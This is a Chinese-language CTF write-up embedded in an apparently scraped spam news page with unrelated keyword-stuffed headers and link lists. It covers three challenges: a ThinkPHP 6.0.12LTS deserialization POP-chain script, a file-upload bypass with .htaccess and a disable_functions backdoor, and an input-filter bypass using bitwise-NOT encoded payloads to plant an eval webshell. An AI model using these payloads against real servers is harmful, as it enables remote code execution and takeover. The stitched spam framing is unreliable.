当前位置: 首页 > news >正文

自己做网站投入天津建设工程招标信息网官网

自己做网站投入,天津建设工程招标信息网官网,都匀网站开发,盐渎网[CISCN 2022 初赛]ezpop ThinkPHP V6.0.12LTS 反序列化漏洞 漏洞分析 ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户 解题过程 ThinkPHP V6.0.12LTS反序列化的链子可以找到#xff0c;找到反序列化的入口就行 反序列化的入口在index.php/index/test 链子 …[CISCN 2022 初赛]ezpop ThinkPHP V6.0.12LTS 反序列化漏洞 漏洞分析 ThinkPHP6.0.12LTS反序列漏洞分析 - FreeBuf网络安全行业门户 解题过程 ThinkPHP V6.0.12LTS反序列化的链子可以找到找到反序列化的入口就行 反序列化的入口在index.php/index/test 链子 ?php // 保证命名空间的一致 namespace think {// Model需要是抽象类abstract class Model {// 需要用到的关键字private $lazySave false;private $data [];private $exists false;protected $table;private $withAttr [];protected $json [];protected $jsonAssoc false;// 初始化public function __construct($obj) {$this-lazySave true;$this-data [whoami[命令]];$this-exists true;$this-table $obj; // 触发__toString$this-withAttr [whoami[system]];$this-json [whoami];$this-jsonAssoc true;}} }namespace think\model {use think\Model;class Pivot extends Model {}// 实例化$p new Pivot(new Pivot());echo urlencode(serialize($p)); } [CISCN 2023 西南]do_you_like_read  主要涉及的就是代码审计 先尝试登录 用户名admin爆破出密码为admin123(用户名和密码都是弱口令所以优先尝试admin当然也可以去翻数据库) 密码进行md5解密一下admin123登录之后能发现是一个图书管理系统 找了以后发现有文件上传的漏洞结合源码试着getshell if (isset($_FILES[image]) $_FILES[image][name] ! ) {$image $_FILES[image][name];// 检查文件名的扩展名是否已经是.php$ext pathinfo($image, PATHINFO_EXTENSION);if (strtolower($ext) php|| strtolower($ext) phtml || strtolower($ext) php5 || strtolower($ext) php2) {// 将文件名的扩展名替换为.jpg$image pathinfo($image, PATHINFO_FILENAME) . .jpg;}elseif (strtolower($ext) ! jpg) {// 忽略其他后缀名并不做修改$image $_FILES[image][name];}$directory_self str_replace(basename($_SERVER[PHP_SELF]), , $_SERVER[PHP_SELF]);$uploadDirectory $_SERVER[DOCUMENT_ROOT] . $directory_self . bootstrap/img/;$uploadDirectory . $image;move_uploaded_file($_FILES[image][tmp_name], $uploadDirectory); } 对上传文件的后缀做了限制并且把php的拓展名修改为jpg所以上传个jpg文件和.htaccess 蚁剑连接后权限不够不能catflag再找找代码中有bypass,存在后门可以直接利用进行命令执行 echo p bexample/b: http://site.com/bypass_disablefunc.php?cmdpwdoutpath/tmp/xxsopath/var/www/bypass_disablefunc_x64.so /p; 修改一下路径 http://node4.anna.nssctf.cn:28314/bootstrap/test/bypass_disablefunc.php?cmdls%20/outpath/tmp/xxsopath/app/bootstrap/test/bypass_disablefunc_x64.so 目录下没有发现flag试试环境变量 /bootstrap/test/bypass_disablefunc.php?cmdenvoutpath/tmp/xxsopath/var/www/html/bootstrap/test/bypass_disablefunc_x64.so [极客大挑战 2019]RCE ME  上来就是一串简单的代码(看完国赛的代码已经是被折磨惨了) ?php error_reporting(0); if(isset($_GET[code])){$code$_GET[code];if(strlen($code)40){die(This is too Long.);}if(preg_match(/[A-Za-z0-9]/,$code)){die(NO.);}eval($code); } else{highlight_file(__FILE__); }// ? get传参限制字符串长度小于40正则过滤字母数字取反绕过 尝试取反后进行命令执行 ?code(~%8C%86%8C%8B%9A%92)(~%93%8C); 没有回显看看disable_functions过滤了什么 命令和函数都过滤了很多传一句话木马getshell 正常我们写一句话木马是用eval来执行后面的post但是这里我们要用变量来调用函数eval不是php函数无法被调用所以用assert来运行php代码这个点在涉及到php环境中调用函数来构造payload的时候要注意 ?php $aassert; $burlencode(~$a); echo $b; echo \n; $c(eval($_POST[shell])); $durlencode(~$c); echo $d;? 蚁剑连接 flag里面什么也没有readflag里面是乱码应该是因为disable_functions所以我们不能正常读取flag 使用蚁剑插件绕过disable_functions使用readflag来获取flag 这题可能还是这个使用插件绕过disable_functions这里之前没见过
http://www.hkea.cn/news/14336175/

相关文章:

  • 零食天堂专做零食推荐的网站梁志天设计公司简介
  • 哪个网站做宣传比较好上海职业技能培训机构一览表
  • 自助网站设计平台网站建设选方舟网络
  • 哈尔滨道外区建设局官方网站织梦cms 获得网站流量次数
  • 沈阳哪个网站建设公司好网站流量数据
  • 中关村能力建设网站设计制作散发寄递
  • 北京建站优化公司企业官网建设的重要性
  • 台州seo网站排名杭州公司网站制作
  • 网站的验证码怎么做深圳网站建设有免费的吗
  • 做 英语试题的网站wordpress视频自动略图
  • pc端手机网站 viewport 自适应公司网站建设youyi51
  • 互联网公司网站建设ppt模板seo网站服务公司
  • 哪类小网站容易做网络系统分类
  • 网站开发流行语言大连高新园区邮编
  • wordpress做淘客网站北京网站开发的趋势在哪里
  • 外贸英语 网站智慧团建官网手机版登录
  • 唐汉网站建设如何有效的推广宣传
  • 将网页加入可信站点最新中高风险地区名单
  • 如何制作新型网站程序地方网站盈利
  • 腾讯云网站建设视频教程wordpress用户名或密码错误
  • dz系统怎么做地方网站义乌前十跨境电商公司
  • 网站增加权重湖南常德石门县
  • 网站链接优化怎么做广东深广东深圳网站建设服务
  • 空间ip地址访问网站福州网站推广定制
  • 河南小学网站建设礼品公司网站建设
  • 深圳建设材料价格网站仿木鱼网络网站
  • wordpress打印插件西安的网络优化公司
  • 房产门户网站平台搭建个人做哪方面的网站
  • 沈阳网站设计定制网站建设建设网站的编程过程
  • 百度做网站的公司社区类网站开发